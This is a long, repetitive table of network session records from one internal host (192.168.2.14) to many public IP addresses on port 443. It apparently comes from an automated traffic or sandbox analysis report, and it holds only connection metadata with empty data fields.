                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13645192.168.2.144573620.17.156.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13646192.168.2.1456208164.122.143.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13647192.168.2.1434712102.80.0.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13648192.168.2.1444860223.2.36.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13649192.168.2.1453952116.5.139.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13650192.168.2.1433790184.69.11.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13651192.168.2.145667240.107.169.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13652192.168.2.143447447.34.217.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13653192.168.2.1447784110.247.169.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13654192.168.2.145049075.185.25.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13655192.168.2.1456442143.51.247.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13656192.168.2.1458986191.70.89.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13657192.168.2.1453596181.119.20.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13658192.168.2.1455730114.129.103.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13659192.168.2.1450498120.138.120.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13660192.168.2.143849698.208.157.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13661192.168.2.145079038.249.54.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13662192.168.2.145347031.174.120.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13663192.168.2.1457894198.241.153.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13664192.168.2.143954269.211.47.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13665192.168.2.1442052161.132.190.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13666192.168.2.1442812223.214.204.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13667192.168.2.145408468.171.15.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13668192.168.2.143641034.108.231.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13669192.168.2.145335270.63.255.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13670192.168.2.1447276167.59.214.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13671192.168.2.1454762207.233.67.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13672192.168.2.145324046.44.255.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13673192.168.2.145573294.64.79.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13674192.168.2.143814894.93.253.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13675192.168.2.1439248190.243.33.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13676192.168.2.1444304187.90.14.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13677192.168.2.143509061.228.183.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13678192.168.2.145204461.170.159.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13679192.168.2.145363434.172.252.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13680192.168.2.1441616130.236.145.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13681192.168.2.143876881.39.67.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13682192.168.2.143615836.105.98.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13683192.168.2.1436510135.8.153.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13684192.168.2.1434860223.244.185.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13685192.168.2.1449044104.139.231.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13686192.168.2.145810648.244.18.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13687192.168.2.145139686.186.57.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13688192.168.2.1459876198.65.150.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13689192.168.2.14586561.76.59.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13690192.168.2.1449722220.255.250.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13691192.168.2.144750459.144.62.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13692192.168.2.1457730212.168.84.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13693192.168.2.1454282149.110.46.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13694192.168.2.1447728100.28.49.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13695192.168.2.1433842169.13.164.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13696192.168.2.1445414162.225.30.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13697192.168.2.1432782138.193.172.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13698192.168.2.144848619.81.95.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13699192.168.2.1454530165.209.192.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13700192.168.2.145935441.5.76.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13701192.168.2.144512823.119.213.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13702192.168.2.143607245.124.112.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13703192.168.2.144508683.154.123.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13704192.168.2.1444554198.223.15.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13705192.168.2.1454224102.85.241.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13706192.168.2.1450956210.109.40.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13707192.168.2.143347238.171.69.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13708192.168.2.1457182159.105.132.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13709192.168.2.144779281.248.77.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13710192.168.2.1432960221.160.221.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13711192.168.2.143764836.93.180.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13712192.168.2.1441110104.185.15.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13713192.168.2.1440110185.21.23.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13714192.168.2.1444380189.24.253.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13715192.168.2.1441718146.63.133.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13716192.168.2.1433032185.185.29.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13717192.168.2.1445492123.253.169.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13718192.168.2.1459624192.201.169.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13719192.168.2.144366241.91.145.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13720192.168.2.1460658106.168.232.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13721192.168.2.1460460153.167.29.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13722192.168.2.1449830195.151.141.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13723192.168.2.1439288162.218.156.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13724192.168.2.145158475.191.10.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13725192.168.2.1450926199.144.33.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13726192.168.2.14341229.142.38.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13727192.168.2.1452520139.125.213.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13728192.168.2.1439372133.162.133.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13729192.168.2.1458108145.62.208.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13730192.168.2.1457262109.109.161.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13731192.168.2.1452714115.183.78.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13732192.168.2.1459718211.185.141.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13733192.168.2.145192084.143.71.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13734192.168.2.1434224162.207.132.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13735192.168.2.144429046.212.136.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13736192.168.2.1456998208.105.163.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13737192.168.2.1446182209.134.41.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13738192.168.2.144716834.158.46.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13739192.168.2.145025440.153.46.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13740192.168.2.1433078112.220.178.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13741192.168.2.145445849.135.99.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13742192.168.2.1434648190.235.77.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13743192.168.2.145662667.255.31.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13744192.168.2.146045636.167.94.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13745192.168.2.1453620114.225.212.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13746192.168.2.1438252143.7.206.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13747192.168.2.143805270.9.130.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13748192.168.2.144780085.194.73.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13749192.168.2.14425961.45.65.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13750192.168.2.1448594140.97.217.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13751192.168.2.144221636.85.170.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13752192.168.2.143993236.61.209.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13753192.168.2.1453968182.135.33.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13754192.168.2.1443566223.252.79.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13755192.168.2.143960458.22.54.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13756192.168.2.1452020126.84.218.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13757192.168.2.1454128158.229.70.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13758192.168.2.146027871.156.153.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13759192.168.2.1439750122.177.235.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13760192.168.2.1460998158.1.150.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13761192.168.2.1442328103.93.188.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13762192.168.2.1458286125.201.100.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13763192.168.2.144113492.25.181.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13764192.168.2.145700098.151.182.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13765192.168.2.144452080.156.0.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13766192.168.2.1445094128.51.164.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13767192.168.2.1443116191.29.27.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13768192.168.2.1442378117.229.219.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13769192.168.2.1452936107.81.231.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13770192.168.2.143744660.27.162.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13771192.168.2.145274073.134.132.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13772192.168.2.145482488.169.2.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13773192.168.2.143518017.80.39.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13774192.168.2.1460228213.169.191.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13775192.168.2.1456810213.79.106.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13776192.168.2.1457102135.223.213.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13777192.168.2.144818245.175.233.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13778192.168.2.1441778104.205.26.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13779192.168.2.145224251.212.181.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13780192.168.2.1442362106.88.251.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13781192.168.2.1437660148.175.254.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13782192.168.2.144991432.179.139.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13783192.168.2.143952285.52.201.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13784192.168.2.1459254115.208.168.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13785192.168.2.1452700210.214.49.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13786192.168.2.1457534162.65.189.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13787192.168.2.1446510157.85.159.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13788192.168.2.1457014194.162.22.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13789192.168.2.145239465.229.40.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13790192.168.2.145214093.206.122.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13791192.168.2.1457924213.235.54.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13792192.168.2.1445874102.92.233.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13793192.168.2.1456636219.24.84.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13794192.168.2.1457822179.39.63.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13795192.168.2.143322240.50.141.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13796192.168.2.1455272178.149.30.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13797192.168.2.1459564137.131.119.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13798192.168.2.144496462.152.73.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13799192.168.2.145071213.166.4.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13800192.168.2.1456902211.217.65.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13801192.168.2.1445200150.70.93.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13802192.168.2.1434512205.242.222.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13803192.168.2.1439636143.148.40.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13804192.168.2.1437336173.204.51.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13805192.168.2.144114673.33.196.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13806192.168.2.1438028142.187.156.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13807192.168.2.1459906217.156.219.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13808192.168.2.1438450200.136.109.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13809192.168.2.1460470203.30.211.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13810192.168.2.1446036136.150.17.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13811192.168.2.144625263.78.55.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13812192.168.2.1447172162.150.11.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13813192.168.2.144510298.89.149.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13814192.168.2.1433290190.117.239.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13815192.168.2.1450724147.82.179.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13816192.168.2.1443804141.97.59.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13817192.168.2.144951259.234.168.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13818192.168.2.1433250203.185.149.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13819192.168.2.143552620.183.151.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13820192.168.2.1433186112.147.29.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13821192.168.2.145751472.83.216.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13822192.168.2.1439064120.29.159.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13823192.168.2.143609213.157.194.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13824192.168.2.1456898122.145.59.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13825192.168.2.1456466218.123.99.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13826192.168.2.1438900203.117.231.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13827192.168.2.1437038107.140.134.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13828192.168.2.1448762130.140.63.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13829192.168.2.1459616218.177.29.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13830192.168.2.145826854.232.103.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13831192.168.2.145774088.185.138.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13832192.168.2.1440146145.233.197.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13833192.168.2.145428288.77.161.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13834192.168.2.145968839.77.22.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13835192.168.2.144749291.135.199.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13836192.168.2.1441788134.55.68.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13837192.168.2.143526043.167.96.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13838192.168.2.145995867.226.152.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13839192.168.2.1457272112.231.106.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13840192.168.2.1449546131.106.9.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13841192.168.2.1455926194.231.204.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13842192.168.2.1460416136.98.121.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13843192.168.2.1443782193.5.47.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13844192.168.2.1449238202.228.160.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13845192.168.2.1453964137.45.254.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13846192.168.2.1457636100.42.204.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13847192.168.2.145311020.118.207.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13848192.168.2.143622243.174.32.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13849192.168.2.145787873.113.146.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13850192.168.2.144834873.147.31.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13851192.168.2.1456124122.69.10.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13852192.168.2.144330094.136.248.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13853192.168.2.145309095.140.45.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13854192.168.2.1443212109.143.200.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13855192.168.2.145583885.76.120.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13856192.168.2.144575618.2.159.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13857192.168.2.145339427.38.254.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13858192.168.2.145032495.12.55.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13859192.168.2.1454088104.232.255.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13860192.168.2.1459050179.173.33.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13861192.168.2.1435658158.149.95.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13862192.168.2.1453924186.4.34.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13863192.168.2.1448900189.154.167.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13864192.168.2.1452286119.29.51.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13865192.168.2.1452442151.92.77.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13866192.168.2.1451382133.80.16.235443
